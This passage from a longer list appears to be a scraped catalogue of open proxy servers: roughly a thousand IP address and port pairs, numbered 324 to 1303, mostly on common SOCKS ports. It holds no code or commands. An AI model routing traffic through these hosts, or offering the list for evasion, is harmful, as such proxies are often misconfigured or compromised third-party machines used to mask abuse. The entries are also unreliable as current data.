188.166.104.152:63090 324 | 182.93.84.43:5678 325 | 36.89.252.90:5678 326 | 42.228.3.158:5678 327 | 170.84.83.54:5678 328 | 200.81.146.17:1080 329 | 111.67.71.52:4145 330 | 117.4.107.199:51796 331 | 138.99.93.62:4145 332 | 80.71.112.99:55243 333 | 201.159.103.97:31337 334 | 81.12.104.39:3629 335 | 190.12.95.170:37209 336 | 93.63.75.62:1080 337 | 41.207.85.93:5678 338 | 83.103.195.183:4145 339 | 36.66.98.233:52851 340 | 185.7.169.29:5678 341 | 36.95.74.29:5678 342 | 176.215.237.166:5678 343 | 177.8.170.122:1080 344 | 201.143.32.82:4153 345 | 202.29.218.138:4153 346 | 103.8.59.1:4145 347 | 119.18.159.122:4153 348 | 62.63.157.106:4153 349 | 117.197.124.178:5678 350 | 197.232.135.174:5678 351 | 31.171.169.90:5678 352 | 103.166.38.65:3629 353 | 114.33.163.208:5678 354 | 103.83.179.38:5678 355 | 139.5.29.97:36983 356 | 51.222.12.245:10084 357 | 165.90.92.1:5678 358 | 95.111.91.50:10801 359 | 103.102.142.98:4145 360 | 188.143.91.230:5678 361 | 195.112.197.19:41021 362 | 216.245.192.130:11696 363 | 80.80.167.249:10801 364 | 50.227.46.1:32482 365 | 213.6.188.214:3629 366 | 183.61.172.34:7890 367 | 178.72.90.70:5678 368 | 103.10.59.73:4145 369 | 146.120.8.238:5678 370 | 190.122.61.21:4145 371 | 103.61.198.122:4145 372 | 185.103.14.155:4153 373 | 1.186.46.36:5678 374 | 102.128.131.72:1080 375 | 192.225.110.51:5678 376 | 200.27.110.30:57702 377 | 206.192.226.90:39593 378 | 157.119.201.231:1080 379 | 122.102.43.185:5678 380 | 103.235.198.94:5678 381 | 41.206.43.218:5678 382 | 185.236.46.221:5678 383 | 102.23.128.1:5678 384 | 82.135.136.132:4145 385 | 185.19.213.56:5678 386 | 192.12.113.255:4145 387 | 37.17.162.202:5678 388 | 202.166.206.59:5678 389 | 103.228.246.129:5678 390 | 189.16.248.226:5678 391 | 65.20.178.15:5678 392 | 88.119.49.4:4153 393 | 41.77.8.110:5678 394 | 103.85.103.41:5678 395 | 185.152.12.49:54680 396 | 103.144.255.146:5678 397 | 203.189.159.161:3629 398 | 5.56.133.204:4444 399 | 201.220.149.153:5678 400 | 159.65.180.9:9050 401 | 170.84.82.62:4145 402 | 158.58.133.38:5678 403 | 201.220.128.88:3000 404 | 45.129.123.101:4153 405 | 31.25.243.40:9102 406 | 36.90.181.210:4153 407 | 36.66.167.242:4153 408 | 103.215.148.17:43928 409 | 121.200.62.18:4153 410 | 103.70.159.141:5678 411 | 194.213.43.166:59316 412 | 202.136.88.68:1080 413 | 103.241.108.206:3629 414 | 20.210.80.237:1080 415 | 103.108.144.142:5678 416 | 190.107.130.164:5678 417 | 103.84.172.81:4153 418 | 188.137.81.108:5678 419 | 212.115.232.79:10800 420 | 103.107.68.61:5430 421 | 174.75.211.222:4145 422 | 203.150.136.34:3629 423 | 185.180.131.71:5678 424 | 103.216.82.19:6667 425 | 87.140.60.37:4153 426 | 181.78.24.27:5678 427 | 119.197.0.17:4145 428 | 185.153.198.210:12791 429 | 103.221.253.145:38247 430 | 191.98.196.15:5678 431 | 31.14.124.62:4145 432 | 177.85.234.142:5678 433 | 116.206.61.179:5678 434 | 103.233.152.180:1080 435 | 182.160.124.106:5678 436 | 198.89.91.90:5678 437 | 139.192.118.150:5678 438 | 67.213.212.11:20025 439 | 194.213.8.34:5678 440 | 80.71.112.120:55243 441 | 46.188.53.61:3629 442 | 27.72.173.14:5678 443 | 70.166.167.36:4145 444 | 165.90.60.69:4145 445 | 177.105.68.175:4153 446 | 83.149.171.70:1088 447 | 114.7.121.94:4145 448 | 117.54.3.230:4153 449 | 170.0.198.212:4153 450 | 192.111.139.165:4145 451 | 192.252.220.92:17328 452 | 103.203.65.2:48685 453 | 185.169.181.13:4145 454 | 190.61.85.237:4153 455 | 179.189.204.181:5678 456 | 46.101.159.153:29329 457 | 14.207.28.22:4153 458 | 185.106.138.17:4153 459 | 119.57.115.54:30622 460 | 36.37.104.98:34040 461 | 192.111.129.150:4145 462 | 101.51.144.163:5678 463 | 197.250.15.58:3043 464 | 117.79.80.93:4145 465 | 103.217.249.250:5678 466 | 91.240.237.158:1080 467 | 190.215.207.162:5678 468 | 70.127.78.92:5678 469 | 156.155.235.8:5678 470 | 105.27.143.174:4153 471 | 123.31.12.41:41558 472 | 190.128.28.69:4153 473 | 196.27.107.231:55760 474 | 184.178.172.28:15294 475 | 197.253.59.38:5678 476 | 45.6.228.178:4145 477 | 113.161.237.84:5678 478 | 190.171.170.70:4153 479 | 185.59.67.131:5678 480 | 103.122.98.244:4153 481 | 46.227.36.1:1088 482 | 190.210.251.2:37240 483 | 191.0.67.227:3629 484 | 200.81.144.13:1080 485 | 168.194.83.45:44328 486 | 212.33.239.50:32107 487 | 50.62.30.5:17182 488 | 206.126.57.190:5678 489 | 193.34.161.129:44436 490 | 184.178.172.5:15303 491 | 195.225.48.193:55774 492 | 49.156.33.154:5678 493 | 118.70.124.34:5678 494 | 83.218.186.22:5678 495 | 38.142.63.146:31596 496 | 159.203.33.4:42137 497 | 80.71.112.105:55243 498 | 103.224.185.48:57400 499 | 84.243.108.186:3629 500 | 36.95.4.169:5678 501 | 89.36.163.119:4145 502 | 45.115.39.18:41967 503 | 181.15.154.154:52033 504 | 103.47.93.221:1080 505 | 36.37.251.171:5678 506 | 103.116.174.126:5678 507 | 45.7.176.78:52246 508 | 177.105.68.250:4153 509 | 122.200.144.249:4153 510 | 103.217.213.145:4145 511 | 79.133.202.7:1088 512 | 209.58.150.225:38597 513 | 185.32.47.105:4153 514 | 170.238.44.129:4153 515 | 177.93.72.130:4153 516 | 203.142.83.42:4153 517 | 98.175.31.195:4145 518 | 202.179.184.126:5430 519 | 23.88.100.242:10047 520 | 187.62.88.3:4153 521 | 31.129.253.30:39540 522 | 103.130.112.129:5678 523 | 103.44.15.193:4145 524 | 185.99.33.171:5678 525 | 194.183.174.14:3629 526 | 176.102.130.41:5678 527 | 202.129.52.173:4153 528 | 1.179.172.45:31225 529 | 178.48.68.61:4145 530 | 169.239.45.51:4153 531 | 31.146.223.218:56308 532 | 36.91.233.114:5678 533 | 188.24.40.117:5678 534 | 93.89.66.131:5678 535 | 95.169.213.76:4145 536 | 37.29.35.190:4145 537 | 174.77.111.198:49547 538 | 182.160.127.236:5678 539 | 177.86.64.201:3629 540 | 196.250.39.65:5678 541 | 185.42.228.66:1080 542 | 103.236.161.43:5430 543 | 203.109.200.68:5678 544 | 117.40.159.249:32783 545 | 213.212.217.109:5678 546 | 129.18.192.234:5678 547 | 213.32.252.127:5678 548 | 49.221.155.19:1080 549 | 212.156.86.38:4145 550 | 103.134.184.134:5430 551 | 179.217.179.207:4145 552 | 89.28.120.19:39142 553 | 122.3.205.167:5678 554 | 109.254.4.142:5678 555 | 61.142.72.150:33235 556 | 41.190.39.125:1080 557 | 123.59.100.247:1080 558 | 213.16.81.147:5678 559 | 117.202.20.68:1088 560 | 120.50.13.41:40308 561 | 142.4.207.10:53579 562 | 36.95.100.204:5678 563 | 142.93.137.235:47896 564 | 98.188.47.132:4145 565 | 114.109.172.105:4145 566 | 36.95.133.234:1080 567 | 91.203.114.71:42905 568 | 58.18.133.100:38051 569 | 190.186.22.249:5678 570 | 185.208.191.110:1088 571 | 27.72.145.184:5678 572 | 109.86.219.161:3629 573 | 1.212.157.115:4145 574 | 181.129.144.59:3629 575 | 185.67.100.105:4153 576 | 216.127.113.58:5678 577 | 163.53.150.138:5678 578 | 103.35.168.53:4153 579 | 2.139.162.80:4145 580 | 94.180.128.219:4145 581 | 103.140.205.197:1080 582 | 59.39.63.54:4153 583 | 138.122.148.208:4145 584 | 46.219.80.142:45237 585 | 62.201.220.50:60212 586 | 98.188.47.150:4145 587 | 131.0.246.113:4153 588 | 202.159.35.25:443 589 | 114.108.177.104:60984 590 | 171.244.22.20:55769 591 | 115.127.121.206:5678 592 | 103.70.206.65:59311 593 | 94.153.209.22:3629 594 | 103.217.237.46:5678 595 | 103.122.168.13:5678 596 | 201.131.214.27:5678 597 | 102.176.160.70:5678 598 | 195.24.61.7:51544 599 | 177.36.6.90:5678 600 | 175.144.198.226:31694 601 | 103.111.137.69:5678 602 | 121.200.63.26:10801 603 | 178.62.79.49:51592 604 | 81.163.254.104:3629 605 | 151.236.247.213:5678 606 | 72.22.38.133:56988 607 | 92.45.19.35:5678 608 | 118.99.90.130:4145 609 | 110.44.113.162:5678 610 | 187.62.88.12:4153 611 | 83.168.84.89:4153 612 | 101.51.104.76:4145 613 | 70.166.167.38:57728 614 | 190.6.97.101:5678 615 | 180.250.175.109:4153 616 | 78.108.70.88:4153 617 | 92.245.102.243:1080 618 | 37.57.146.33:5678 619 | 209.45.111.198:5678 620 | 103.100.12.1:4153 621 | 170.84.92.190:5678 622 | 195.206.34.215:40674 623 | 62.85.224.217:5678 624 | 131.221.148.78:4153 625 | 36.95.189.165:5678 626 | 104.236.45.251:53651 627 | 129.18.180.224:5678 628 | 85.233.153.173:4153 629 | 102.219.33.98:1080 630 | 209.169.132.84:4145 631 | 91.126.138.135:5678 632 | 203.205.29.108:5678 633 | 118.127.125.34:5678 634 | 138.99.93.224:4145 635 | 103.156.161.96:5678 636 | 185.136.150.252:4145 637 | 203.153.109.150:49947 638 | 212.72.149.234:4145 639 | 36.67.249.249:5678 640 | 187.11.232.71:4153 641 | 103.195.141.230:5678 642 | 103.146.184.53:1088 643 | 181.198.111.122:5678 644 | 46.149.34.230:4153 645 | 103.146.184.51:1088 646 | 181.166.106.224:42315 647 | 89.250.144.79:4145 648 | 185.164.75.48:5678 649 | 50.251.146.121:5678 650 | 45.7.224.216:4153 651 | 89.249.210.123:5678 652 | 222.124.34.196:5678 653 | 188.237.60.27:1080 654 | 85.112.70.190:5678 655 | 46.209.118.50:5678 656 | 192.111.129.145:16894 657 | 168.228.197.91:5678 658 | 89.25.23.210:4153 659 | 177.93.76.6:4145 660 | 187.62.191.3:33428 661 | 185.66.57.125:42647 662 | 93.83.108.58:4153 663 | 45.123.0.122:5678 664 | 1.1.243.156:5678 665 | 114.6.30.83:5678 666 | 103.53.109.162:5678 667 | 45.7.176.244:52246 668 | 103.51.46.4:4145 669 | 103.107.68.13:5430 670 | 36.95.120.101:5678 671 | 115.127.121.194:5678 672 | 190.210.93.15:5678 673 | 122.3.207.17:5678 674 | 190.188.199.220:4153 675 | 187.62.88.4:4153 676 | 169.255.136.14:60279 677 | 72.223.168.73:57494 678 | 190.109.72.229:33633 679 | 81.95.135.130:4153 680 | 1.179.183.73:61468 681 | 105.213.128.109:5678 682 | 45.250.65.188:5678 683 | 50.242.122.141:32100 684 | 196.28.234.66:1080 685 | 182.93.84.136:17600 686 | 114.4.121.90:4153 687 | 81.91.144.46:5678 688 | 198.199.101.121:33894 689 | 168.232.60.242:5678 690 | 181.143.204.98:5678 691 | 138.59.177.117:5678 692 | 212.98.147.59:4153 693 | 186.97.238.11:4153 694 | 78.186.111.34:1080 695 | 217.115.213.187:4145 696 | 31.41.225.205:45067 697 | 201.221.129.134:5678 698 | 81.12.169.254:4153 699 | 36.255.61.190:4145 700 | 80.71.112.108:55243 701 | 93.184.65.91:10801 702 | 202.138.242.6:38373 703 | 102.222.36.154:5678 704 | 43.243.204.106:35805 705 | 125.209.114.38:5678 706 | 167.172.241.216:28798 707 | 185.204.85.58:4153 708 | 192.145.205.74:4145 709 | 36.95.69.5:5678 710 | 103.70.159.153:5678 711 | 77.252.26.70:10801 712 | 182.160.121.99:10800 713 | 159.65.170.145:59601 714 | 201.222.81.33:5678 715 | 187.103.79.233:4153 716 | 165.227.119.98:51384 717 | 5.133.27.11:5678 718 | 103.93.106.105:4153 719 | 213.6.145.33:4153 720 | 36.91.45.10:51299 721 | 103.38.102.182:43189 722 | 119.23.226.124:6111 723 | 188.166.54.103:8080 724 | 103.86.1.9:4145 725 | 192.12.113.237:4145 726 | 80.70.22.10:4153 727 | 176.118.51.82:3629 728 | 201.157.254.134:4145 729 | 197.157.219.169:4145 730 | 200.119.114.45:5678 731 | 49.49.74.204:5678 732 | 46.174.234.96:5678 733 | 46.55.25.191:61308 734 | 200.42.89.50:4153 735 | 174.64.199.82:4145 736 | 103.94.133.93:4153 737 | 179.42.52.2:4153 738 | 180.211.158.90:5678 739 | 192.111.137.34:18765 740 | 197.221.90.54:56810 741 | 166.62.83.60:48127 742 | 85.55.167.178:5678 743 | 61.14.228.134:46652 744 | 173.82.252.153:53290 745 | 60.22.22.15:1080 746 | 184.185.2.190:4145 747 | 93.182.76.244:5678 748 | 103.235.179.105:5678 749 | 103.239.52.215:5678 750 | 202.159.60.137:443 751 | 185.215.163.94:3629 752 | 45.117.228.81:4145 753 | 223.165.241.9:47205 754 | 109.74.57.220:5678 755 | 36.37.244.41:5678 756 | 182.52.58.44:4153 757 | 110.34.166.182:4153 758 | 192.252.215.5:16137 759 | 178.22.116.168:5678 760 | 103.114.98.205:1080 761 | 218.106.166.114:4145 762 | 36.92.96.179:5678 763 | 62.99.178.46:43636 764 | 124.105.55.176:30906 765 | 188.133.160.22:4145 766 | 97.74.230.87:47150 767 | 176.123.218.161:18080 768 | 197.248.249.147:5678 769 | 191.7.4.194:5678 770 | 103.164.107.82:5678 771 | 192.252.209.155:14455 772 | 188.114.208.99:5678 773 | 187.84.191.25:38392 774 | 115.238.59.86:36253 775 | 185.64.105.82:9050 776 | 197.232.43.224:1080 777 | 45.7.176.243:52246 778 | 212.154.251.210:5678 779 | 41.190.233.30:10801 780 | 110.93.13.190:45034 781 | 109.73.191.199:5678 782 | 109.252.233.182:1080 783 | 103.143.234.49:58526 784 | 103.150.48.57:5678 785 | 45.5.152.72:1080 786 | 185.57.229.177:5678 787 | 212.33.240.140:4145 788 | 50.62.63.126:10119 789 | 223.25.101.242:53150 790 | 80.76.236.66:3629 791 | 96.9.77.71:51080 792 | 190.92.72.242:5678 793 | 139.255.94.123:57853 794 | 190.7.231.210:4145 795 | 203.80.170.81:1080 796 | 200.181.51.41:5678 797 | 36.67.146.37:5678 798 | 202.133.4.49:4153 799 | 103.14.251.123:4145 800 | 37.17.53.108:3629 801 | 82.137.250.18:5678 802 | 177.128.198.71:4153 803 | 70.185.68.133:4145 804 | 36.95.106.73:5678 805 | 188.138.215.115:5678 806 | 177.104.117.74:5678 807 | 103.47.93.213:1080 808 | 82.165.137.115:7061 809 | 118.91.132.233:5678 810 | 103.107.68.45:5430 811 | 217.64.27.144:5678 812 | 136.143.144.187:5678 813 | 196.216.220.204:57856 814 | 62.248.101.5:5678 815 | 202.159.121.209:443 816 | 103.59.200.14:4145 817 | 94.159.31.98:1080 818 | 188.112.39.231:5678 819 | 198.27.67.187:63947 820 | 212.233.105.14:5678 821 | 213.32.252.134:5678 822 | 200.80.227.234:4145 823 | 180.183.230.232:5678 824 | 103.215.148.25:43928 825 | 212.200.80.97:5678 826 | 78.140.195.66:3629 827 | 154.79.252.226:5678 828 | 202.154.180.53:57730 829 | 86.100.63.127:4145 830 | 103.199.159.209:41610 831 | 200.49.112.61:34424 832 | 186.46.138.6:44481 833 | 195.81.66.65:4145 834 | 207.241.178.137:8899 835 | 177.101.135.84:5678 836 | 45.238.57.1:3629 837 | 103.217.249.249:5678 838 | 180.211.179.150:40153 839 | 14.248.82.22:5678 840 | 103.126.148.30:5678 841 | 197.82.166.158:1080 842 | 201.148.23.131:1080 843 | 181.174.130.165:5678 844 | 115.89.177.92:1081 845 | 195.214.222.201:5678 846 | 91.98.64.222:5678 847 | 103.59.203.65:4145 848 | 124.158.167.171:5678 849 | 213.5.120.255:3629 850 | 92.47.62.133:1080 851 | 103.216.82.18:6667 852 | 168.227.146.34:10801 853 | 190.63.160.61:4145 854 | 36.67.251.85:5678 855 | 212.103.119.244:4153 856 | 103.59.200.26:4145 857 | 91.144.95.163:4145 858 | 110.77.246.231:4145 859 | 95.224.117.226:1080 860 | 195.210.172.46:58350 861 | 185.32.44.161:4153 862 | 1.20.227.66:4145 863 | 113.108.247.146:20086 864 | 202.40.181.132:5678 865 | 168.194.83.18:44328 866 | 88.12.54.146:1081 867 | 95.158.189.4:5678 868 | 188.0.117.41:5678 869 | 95.38.48.14:5678 870 | 185.75.110.50:43837 871 | 89.133.95.177:4145 872 | 181.3.126.130:1080 873 | 82.142.135.10:4145 874 | 81.16.9.222:3629 875 | 180.180.216.90:5678 876 | 104.236.45.251:1089 877 | 91.198.137.31:3584 878 | 190.7.18.162:5678 879 | 14.248.80.34:5678 880 | 103.94.7.250:4145 881 | 181.115.152.114:4153 882 | 103.196.56.120:5678 883 | 112.78.170.251:5678 884 | 103.150.110.202:9969 885 | 177.139.130.157:4153 886 | 175.28.2.154:5678 887 | 27.123.223.210:4145 888 | 119.18.159.6:4145 889 | 90.181.150.210:4145 890 | 177.73.248.38:55290 891 | 88.119.128.181:4145 892 | 103.151.219.150:1080 893 | 186.121.214.250:5678 894 | 103.25.44.113:4153 895 | 182.160.127.53:48744 896 | 170.84.51.235:55731 897 | 192.162.193.243:54313 898 | 58.145.169.110:1080 899 | 110.42.177.104:1081 900 | 109.238.223.67:61150 901 | 152.231.62.172:5678 902 | 111.118.135.132:33260 903 | 80.80.167.246:10801 904 | 103.143.8.126:5678 905 | 49.156.38.126:5678 906 | 50.62.30.5:10119 907 | 154.74.140.214:5678 908 | 91.150.77.58:56921 909 | 66.76.33.5:5678 910 | 201.220.128.90:3000 911 | 118.67.223.4:5678 912 | 210.10.205.142:5678 913 | 189.121.227.30:5678 914 | 45.64.8.30:5678 915 | 60.2.44.182:34659 916 | 95.77.104.79:37975 917 | 85.117.63.99:4153 918 | 82.206.131.130:5678 919 | 192.111.139.163:19404 920 | 95.71.125.50:60867 921 | 121.13.252.60:61401 922 | 68.183.130.38:52608 923 | 103.236.161.20:5430 924 | 171.100.8.82:49181 925 | 72.217.216.239:4145 926 | 116.68.198.198:5678 927 | 103.50.168.193:4145 928 | 188.138.205.242:4153 929 | 85.237.62.189:3629 930 | 103.131.80.2:31094 931 | 165.22.223.82:49699 932 | 36.74.101.254:5678 933 | 103.146.197.25:5678 934 | 223.25.101.86:5678 935 | 122.152.51.17:5678 936 | 177.184.67.33:4145 937 | 66.42.224.229:41679 938 | 45.122.44.17:5678 939 | 103.199.97.161:39825 940 | 110.164.156.114:5678 941 | 85.198.106.70:1080 942 | 134.209.100.103:52249 943 | 185.203.169.225:1080 944 | 41.160.238.106:5678 945 | 206.42.35.65:4153 946 | 213.14.49.133:5678 947 | 45.7.177.217:39867 948 | 177.91.126.125:5678 949 | 80.28.208.118:10801 950 | 197.231.196.44:37765 951 | 139.159.118.14:5678 952 | 186.225.45.13:45239 953 | 94.127.217.66:56411 954 | 163.47.35.102:4145 955 | 181.209.86.171:58682 956 | 45.224.197.137:4145 957 | 89.96.53.11:1088 958 | 36.95.29.211:5678 959 | 46.167.201.99:5678 960 | 103.12.160.85:61928 961 | 45.125.63.46:44110 962 | 77.121.71.139:5678 963 | 103.164.113.26:5678 964 | 45.182.115.31:4153 965 | 185.190.90.2:4145 966 | 5.58.47.25:3629 967 | 69.163.163.63:49538 968 | 82.209.216.156:1080 969 | 45.6.231.106:4145 970 | 177.223.63.26:52104 971 | 24.37.125.246:3629 972 | 113.160.227.166:5678 973 | 117.102.89.74:5678 974 | 103.253.145.36:48713 975 | 45.155.231.53:1080 976 | 89.36.160.205:4153 977 | 134.209.43.115:29377 978 | 182.72.227.16:5678 979 | 67.201.33.10:25283 980 | 159.203.167.54:51216 981 | 50.204.174.52:60285 982 | 184.178.172.13:15311 983 | 192.111.139.162:4145 984 | 192.12.113.246:4145 985 | 193.77.242.110:4145 986 | 170.254.252.30:5678 987 | 201.184.152.138:44742 988 | 179.125.174.93:5678 989 | 119.57.115.13:30622 990 | 103.236.161.13:5430 991 | 104.139.74.25:34368 992 | 45.7.177.184:39867 993 | 36.92.9.75:49420 994 | 94.228.17.3:5678 995 | 178.168.114.177:5678 996 | 62.133.135.129:4153 997 | 223.165.243.209:47205 998 | 185.145.145.5:4153 999 | 187.216.144.170:5678 1000 | 201.221.134.74:5678 1001 | 198.27.67.187:27262 1002 | 113.53.29.218:45189 1003 | 191.97.3.198:1080 1004 | 201.236.255.97:5678 1005 | 103.86.194.202:5678 1006 | 36.89.156.211:4145 1007 | 58.187.1.241:5678 1008 | 181.115.36.156:5678 1009 | 125.228.143.207:4145 1010 | 98.170.57.231:4145 1011 | 119.2.54.25:5678 1012 | 192.111.138.29:4145 1013 | 148.153.23.18:39593 1014 | 202.50.202.109:48617 1015 | 174.64.199.79:4145 1016 | 197.231.196.156:37765 1017 | 116.199.170.65:4145 1018 | 187.62.88.9:4153 1019 | 138.68.57.62:9050 1020 | 186.97.236.242:5678 1021 | 27.147.131.219:50391 1022 | 103.249.25.50:5678 1023 | 27.147.149.36:5678 1024 | 112.78.175.140:5678 1025 | 210.245.51.20:4145 1026 | 218.75.69.50:56430 1027 | 121.200.60.198:8010 1028 | 62.122.204.63:4153 1029 | 89.24.76.185:34482 1030 | 203.206.235.153:50042 1031 | 38.133.200.94:31596 1032 | 103.77.226.1:4153 1033 | 168.253.192.58:5678 1034 | 98.171.154.23:4145 1035 | 89.174.71.111:52121 1036 | 103.127.21.42:5678 1037 | 122.55.202.100:4145 1038 | 109.101.196.50:4145 1039 | 104.255.170.69:53138 1040 | 106.52.95.168:10808 1041 | 190.109.72.230:33633 1042 | 182.23.79.162:50862 1043 | 117.121.215.98:5678 1044 | 190.211.83.201:5678 1045 | 88.135.45.99:5678 1046 | 62.201.212.194:5678 1047 | 110.78.82.70:5678 1048 | 103.31.84.122:1080 1049 | 105.234.155.221:5678 1050 | 103.80.237.162:4145 1051 | 103.206.245.65:5430 1052 | 187.44.1.248:5678 1053 | 201.25.96.122:4145 1054 | 183.89.249.192:4153 1055 | 45.7.177.213:39867 1056 | 88.135.41.196:5678 1057 | 189.91.85.133:31337 1058 | 85.185.152.148:4145 1059 | 181.118.194.20:5678 1060 | 1.55.241.4:4145 1061 | 36.67.147.222:4153 1062 | 190.4.205.226:4153 1063 | 175.139.179.65:41527 1064 | 119.40.87.90:5678 1065 | 196.40.117.114:5678 1066 | 98.162.96.53:10663 1067 | 107.170.186.131:5555 1068 | 103.47.216.19:4145 1069 | 46.101.5.73:48528 1070 | 105.209.40.21:5678 1071 | 45.70.204.21:4145 1072 | 200.46.191.130:5678 1073 | 78.189.10.14:49307 1074 | 164.40.250.71:5678 1075 | 180.210.222.213:1080 1076 | 85.116.120.106:3629 1077 | 139.162.241.44:64198 1078 | 37.159.144.34:5678 1079 | 142.4.207.10:48012 1080 | 192.141.236.10:5678 1081 | 103.241.227.117:6667 1082 | 70.185.68.155:4145 1083 | 181.129.62.2:47377 1084 | 200.108.196.108:4145 1085 | 103.105.67.148:5678 1086 | 188.126.45.161:4153 1087 | 103.254.106.130:4153 1088 | 186.235.118.2:5678 1089 | 1.4.157.35:36202 1090 | 192.252.214.20:15864 1091 | 168.0.143.68:5678 1092 | 103.146.30.12:4145 1093 | 187.16.255.69:4153 1094 | 78.60.130.181:55407 1095 | 41.216.69.34:5678 1096 | 170.81.141.49:61437 1097 | 97.105.14.13:5678 1098 | 27.116.51.92:6667 1099 | 84.242.183.146:4153 1100 | 117.4.243.108:5678 1101 | 177.105.68.191:4153 1102 | 45.55.32.201:63572 1103 | 195.155.98.106:5678 1104 | 103.124.137.251:1080 1105 | 200.52.144.170:33865 1106 | 103.53.45.142:5678 1107 | 45.7.177.218:39867 1108 | 202.179.184.46:5430 1109 | 190.2.212.11:5678 1110 | 212.19.7.134:5678 1111 | 186.251.255.105:31337 1112 | 72.210.252.137:4145 1113 | 65.108.48.131:10044 1114 | 115.85.86.114:5678 1115 | 103.219.141.7:5678 1116 | 85.105.87.11:59341 1117 | 103.24.21.1:5678 1118 | 103.52.252.18:5678 1119 | 36.84.59.53:4145 1120 | 184.181.217.210:4145 1121 | 198.199.101.121:23493 1122 | 36.67.123.239:5678 1123 | 200.85.137.228:4153 1124 | 192.241.179.204:42054 1125 | 103.76.190.209:4153 1126 | 128.201.176.0:5678 1127 | 203.76.112.68:5678 1128 | 117.252.69.104:5678 1129 | 102.65.61.218:4145 1130 | 200.29.120.4:5678 1131 | 103.80.210.174:5678 1132 | 103.134.241.125:5678 1133 | 193.16.247.16:4153 1134 | 182.93.69.74:5678 1135 | 123.200.25.130:4145 1136 | 170.150.101.5:4145 1137 | 192.111.135.17:18302 1138 | 187.95.136.74:5678 1139 | 217.219.179.125:4153 1140 | 203.176.134.226:4153 1141 | 70.166.167.55:57745 1142 | 190.217.68.211:4145 1143 | 103.111.137.94:5678 1144 | 45.112.125.50:4145 1145 | 192.111.130.2:4145 1146 | 45.7.177.226:39867 1147 | 178.72.163.252:13629 1148 | 116.90.211.32:5678 1149 | 177.104.87.23:5678 1150 | 79.101.106.74:33608 1151 | 91.198.137.31:3521 1152 | 103.50.170.9:4145 1153 | 94.247.241.70:51006 1154 | 103.115.252.26:51372 1155 | 31.173.140.183:3629 1156 | 222.165.223.138:41541 1157 | 190.211.82.6:5678 1158 | 190.109.72.250:33633 1159 | 187.111.160.8:58315 1160 | 212.3.105.11:4145 1161 | 191.7.85.206:4145 1162 | 201.140.99.165:1080 1163 | 173.219.43.147:33536 1164 | 213.136.82.77:25494 1165 | 71.69.154.60:10019 1166 | 177.184.67.93:4145 1167 | 91.230.199.174:32151 1168 | 41.174.110.68:1080 1169 | 72.195.114.169:4145 1170 | 186.237.223.200:4145 1171 | 210.48.139.226:4145 1172 | 139.255.113.194:5678 1173 | 184.178.172.25:15291 1174 | 109.196.229.23:5678 1175 | 72.195.34.41:4145 1176 | 106.242.5.206:4145 1177 | 80.240.248.243:4153 1178 | 187.84.191.90:4153 1179 | 185.187.69.65:1088 1180 | 181.78.24.28:5678 1181 | 200.85.137.226:4153 1182 | 202.62.9.140:5678 1183 | 177.105.68.163:4153 1184 | 138.122.47.5:4153 1185 | 168.181.123.194:1080 1186 | 154.117.159.125:5678 1187 | 88.135.43.247:5678 1188 | 49.0.81.219:5678 1189 | 1.179.147.5:52210 1190 | 181.129.52.156:44665 1191 | 1.179.148.9:36476 1192 | 208.102.51.6:58208 1193 | 188.93.235.3:5678 1194 | 185.138.123.178:5678 1195 | 50.205.151.218:64312 1196 | 110.34.166.187:4153 1197 | 1.4.195.114:4145 1198 | 103.14.232.46:5678 1199 | 178.62.22.215:28383 1200 | 102.22.62.33:4145 1201 | 202.183.155.242:4153 1202 | 195.128.141.1:4153 1203 | 93.171.224.46:4153 1204 | 217.169.222.225:1080 1205 | 36.89.89.59:5678 1206 | 72.206.181.97:64943 1207 | 27.147.225.202:4145 1208 | 103.251.221.21:4145 1209 | 178.168.120.136:4153 1210 | 72.206.181.123:4145 1211 | 89.43.5.134:3629 1212 | 45.146.13.200:5678 1213 | 181.48.63.206:4153 1214 | 192.111.135.21:4145 1215 | 148.77.34.200:54321 1216 | 91.150.189.122:60647 1217 | 188.6.164.138:5678 1218 | 187.94.16.59:56187 1219 | 175.41.44.29:34432 1220 | 174.77.111.197:4145 1221 | 103.207.8.82:5678 1222 | 190.123.90.242:4153 1223 | 103.47.93.219:1080 1224 | 188.0.184.78:54483 1225 | 50.96.204.4:18351 1226 | 93.175.194.154:3629 1227 | 142.44.136.97:7001 1228 | 36.95.112.65:5678 1229 | 103.247.21.204:5678 1230 | 176.236.14.2:4153 1231 | 200.81.144.1:1080 1232 | 36.89.11.81:5678 1233 | 42.193.174.84:15002 1234 | 104.248.15.5:20091 1235 | 181.49.212.122:5678 1236 | 93.171.224.53:4153 1237 | 114.7.112.118:4145 1238 | 200.105.192.6:5678 1239 | 14.232.160.247:10801 1240 | 37.17.162.200:5678 1241 | 72.195.34.60:27391 1242 | 104.131.67.63:9300 1243 | 8.214.82.70:1080 1244 | 46.227.162.98:33802 1245 | 14.215.212.37:4153 1246 | 67.204.21.1:64312 1247 | 45.249.101.4:56457 1248 | 200.54.64.34:1080 1249 | 182.160.124.26:5678 1250 | 194.44.243.186:45529 1251 | 218.111.7.148:5678 1252 | 121.101.186.113:43296 1253 | 125.27.10.84:4153 1254 | 185.172.61.31:5678 1255 | 101.132.97.24:7890 1256 | 138.122.8.49:34708 1257 | 36.95.80.35:5678 1258 | 95.140.27.135:59193 1259 | 46.227.37.157:1088 1260 | 91.214.130.253:61221 1261 | 184.179.216.130:4145 1262 | 195.219.98.27:5678 1263 | 201.220.128.87:3000 1264 | 121.13.252.62:61401 1265 | 188.170.237.214:3629 1266 | 202.21.114.134:4153 1267 | 181.129.51.211:50187 1268 | 162.144.66.22:15051 1269 | 189.89.18.86:4145 1270 | 106.52.8.216:1080 1271 | 184.178.172.18:15280 1272 | 103.145.8.146:38855 1273 | 177.36.6.89:5678 1274 | 109.238.222.5:42401 1275 | 24.249.199.12:4145 1276 | 113.89.53.43:4145 1277 | 202.191.15.253:4145 1278 | 89.133.82.143:5678 1279 | 49.156.39.162:5678 1280 | 185.21.39.46:58351 1281 | 177.12.178.9:4153 1282 | 202.180.23.42:4153 1283 | 212.200.160.106:5678 1284 | 37.252.86.97:5678 1285 | 103.77.157.242:4145 1286 | 178.22.123.85:1080 1287 | 45.70.238.88:4153 1288 | 201.18.144.234:5678 1289 | 103.239.6.246:5678 1290 | 95.134.239.35:5678 1291 | 36.95.48.181:5678 1292 | 178.72.106.154:3629 1293 | 202.53.172.76:1080 1294 | 102.23.128.61:5678 1295 | 5.56.134.237:45698 1296 | 168.205.216.93:4145 1297 | 43.224.10.37:6667 1298 | 138.204.234.27:5678 1299 | 45.146.13.219:5678 1300 | 183.87.153.98:48785 1301 | 213.6.68.94:5678 1302 | 142.4.207.10:14632 1303 